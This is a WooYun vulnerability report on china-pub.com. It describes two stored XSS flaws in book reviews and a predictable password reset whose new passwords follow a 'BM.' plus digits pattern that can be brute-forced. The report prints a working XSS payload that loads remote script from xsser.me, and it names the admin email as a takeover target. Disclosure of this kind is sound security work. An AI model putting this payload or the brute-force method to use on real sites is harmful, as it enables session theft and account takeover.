漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-036236
漏洞标题:互动出版网两处问题可修改任意用户密码
相关厂商:china-pub.com
漏洞作者: J4nker
提交时间:2013-09-06 10:41
修复时间:2013-10-21 10:41
公开时间:2013-10-21 10:41
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-09-06: 细节已通知厂商并且等待厂商处理中
2013-09-06: 厂商已经确认,细节仅向厂商公开
2013-09-16: 细节向核心白帽子及相关领域专家公开
2013-09-26: 细节向普通白帽子公开
2013-10-06: 细节向实习白帽子公开
2013-10-21: 细节向公众公开
简要描述:
二个xss,一个逻辑错误。
详细说明:
漏洞证明:
2处存储xss
img src="https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201309/06040823f04602f22f4bbf8fb58246df2fd61e99.jpg" alt="1.jpg" />
在书评的地方 如:http://product.china-pub.com/member/bookpinglun/viewpinglun.asp?id=222772
我的评论的地方
收到xss,这是你们机制问题。
<TD class="pro_pl_m"><div style="width:635px;overflow:auto;">这本书早在一年前就看过电子版了,还是看了几遍,真的很喜欢作者。之前去亚马逊跟当当买都一直缺货,还好还是被我找到了这本书,真的很喜欢。</div>
后台审核过了的话就是一个存储的xss。
<
));"><img src=l onerror=e=document.createElement('script');e.setAttribute('src','//xsser.me/9NkBwy?1353065417');document.body.appendChild(e);>&jump=http%3a%2f%2fuser.qzone.qq.com%2f114967639
还一处就是修改任意用户密码能暴破+社工。完全可以 如
1.
您好!
您在互动出版网(www.china-pub.com)点击了“忘记密码”按钮,故系统自动为您发送了这封邮件。系统为您生成了新的密码:
您的新密码为:BM.353
您好!
您在互动出版网(www.china-pub.com)点击了“忘记密码”按钮,故系统自动为您发送了这封邮件。系统为您生成了新的密码:
您的新密码为:BM.3061
您好!
您在互动出版网(www.china-pub.com)点击了“忘记密码”按钮,故系统自动为您发送了这封邮件。系统为您生成了新的密码:
您的新密码为:BM.718
您好!
您在互动出版网(www.china-pub.com)点击了“忘记密码”按钮,故系统自动为您发送了这封邮件。系统为您生成了新的密码:
您的新密码为:BM.8289
点击了“忘记密码”按钮,故系统自动为您发送了这封邮件。系统为您生成了新的密码:
您的新密码为:BM.747
您好!
您在互动出版网(www.china-pub.com)点击了“忘记密码”按钮,故系统自动为您发送了这封邮件。系统为您生成了新的密码:
您的新密码为:BM.9148
密码头:BM.
修改的密码都是BM.+100-999 就是爆破的话最多900次就能进去。
认证机制太有问题了,直接就是改密码这这最少应该都加个点击吧。
如管理注册账号的邮箱:member@china-pub.com
就能直接找回密码暴破。
管理把用户名认证给- - 了
这样就能直接把任何会员的密码都修改。
2.
还一处问题就是 手机验证
对手机验证不合理,如wooyun上很多这个手机验证的例子。
对错误次数没有认证。
验证码是可以无限自己提交的
修复方案:
过滤的过滤,就算自动改密码也不要是BM.XXXX,其实你什么都比我懂
版权声明:转载请注明来源 J4nker@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2013-09-06 13:53
厂商回复:
谢谢
最新状态:
暂无